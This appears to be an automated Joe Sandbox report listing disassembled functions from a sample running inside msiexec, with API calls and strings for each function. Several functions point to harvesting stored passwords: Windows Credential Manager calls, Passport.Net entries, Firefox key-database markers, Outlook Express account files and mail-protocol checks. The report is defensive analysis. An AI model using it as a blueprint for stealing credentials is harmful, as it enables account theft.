                                                                                        • String ID: %2.2X
                                                                                        APIs
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                        • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                          • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                          • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                          • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                          • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                          • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                          • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                          • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                        • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                        • String ID: ACD
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004091EC
                                                                                        • sprintf.MSVCRT ref: 00409201
                                                                                          • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                          • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                          • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                        • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                        • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                        • String ID: caption$dialog_%d
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                        Strings
                                                                                        • abort due to ROLLBACK, xrefs: 00428781
                                                                                        • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                        • unknown error, xrefs: 004277B2
                                                                                        • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                        • no such savepoint: %s, xrefs: 00426A02
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                          • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmpmemcpy
                                                                                        • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                        • memset.MSVCRT ref: 00410246
                                                                                        • memset.MSVCRT ref: 00410258
                                                                                          • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                        • memset.MSVCRT ref: 0041033F
                                                                                        • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                        • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • wcslen.MSVCRT ref: 0044406C
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                        • strlen.MSVCRT ref: 004440D1
                                                                                          • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                          • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                        • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                        • String ID:
                                                                                        APIs
                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                        • _strcmpi.MSVCRT ref: 00404518
                                                                                        • _strcmpi.MSVCRT ref: 00404536
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strcmpi$memcpystrlen
                                                                                        • String ID: imap$pop3$smtp
                                                                                        • API String ID: 2025310588-821077329
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040C02D
                                                                                          • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                          • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                          • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                          • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                          • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                          • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                          • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                          • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                          • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                          • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                          • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                        • API String ID: 2726666094-3614832568
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00403A88
                                                                                        • memset.MSVCRT ref: 00403AA1
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,?,?,?), ref: 00403AB8
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                        • strlen.MSVCRT ref: 00403AE9
                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                        • String ID:
                                                                                        • API String ID: 1786725549-0
                                                                                        APIs
                                                                                        • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                          • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                          • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                          • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                        • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                        • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                        • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmp$memcpy
                                                                                        • String ID: global-salt$password-check
                                                                                        • API String ID: 231171946-3927197501
                                                                                        APIs
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??3@
                                                                                        • String ID:
                                                                                        • API String ID: 613200358-0
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                        • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                        • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                        • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                        • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                        • EndPaint.USER32(?,?), ref: 004016F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                        • String ID:
                                                                                        • API String ID: 19018683-0
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040644F
                                                                                        • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                        • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                          • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                          • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                        • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                        • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                        • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                        • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                          • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID:
                                                                                        • API String ID: 438689982-0
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0044495F
                                                                                        • memset.MSVCRT ref: 00444978
                                                                                        • memset.MSVCRT ref: 0044498C
                                                                                          • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                        • strlen.MSVCRT ref: 004449A8
                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                        • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                          • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                        • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpymemset$strlen
                                                                                        • String ID:
                                                                                        • API String ID: 2142929671-0
                                                                                        APIs
                                                                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                          • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                        • strlen.MSVCRT ref: 0040F7BE
                                                                                        • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                        • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                        • String ID: Passport.Net\*
                                                                                        • API String ID: 2329438634-3671122194
                                                                                        APIs
                                                                                          • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                        • memset.MSVCRT ref: 0040330B
                                                                                        • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                        • strchr.MSVCRT ref: 0040335A
                                                                                          • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                        • strlen.MSVCRT ref: 0040339C
                                                                                          • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                        • String ID: Personalities
                                                                                        APIs
                                                                                        Strings
                                                                                        • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                        • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: H
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                        APIs
                                                                                          • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                        • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                                                        • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                                                        • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memcmp$memcpy
                                                                                        • String ID: @ $SQLite format 3
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID: winWrite1$winWrite2
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memcpymemset
                                                                                        • String ID: winRead
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0044955B
                                                                                        • memset.MSVCRT ref: 0044956B
                                                                                        • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memcpymemset
                                                                                        • String ID: gj
                                                                                        APIs
                                                                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                        • memset.MSVCRT ref: 0040AB9C
                                                                                          • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                          • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                          • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                        • sprintf.MSVCRT ref: 0040ABE1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                        • String ID: <%s>%s</%s>$</item>$<item>
                                                                                        APIs
                                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                        • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                        • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                        • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 004090C2
                                                                                        • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                        • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                          • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                          • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                        • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                          • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                          • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                          • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                          • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                        • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                        • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                        • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ??3@
                                                                                        • String ID:
                                                                                        APIs
                                                                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
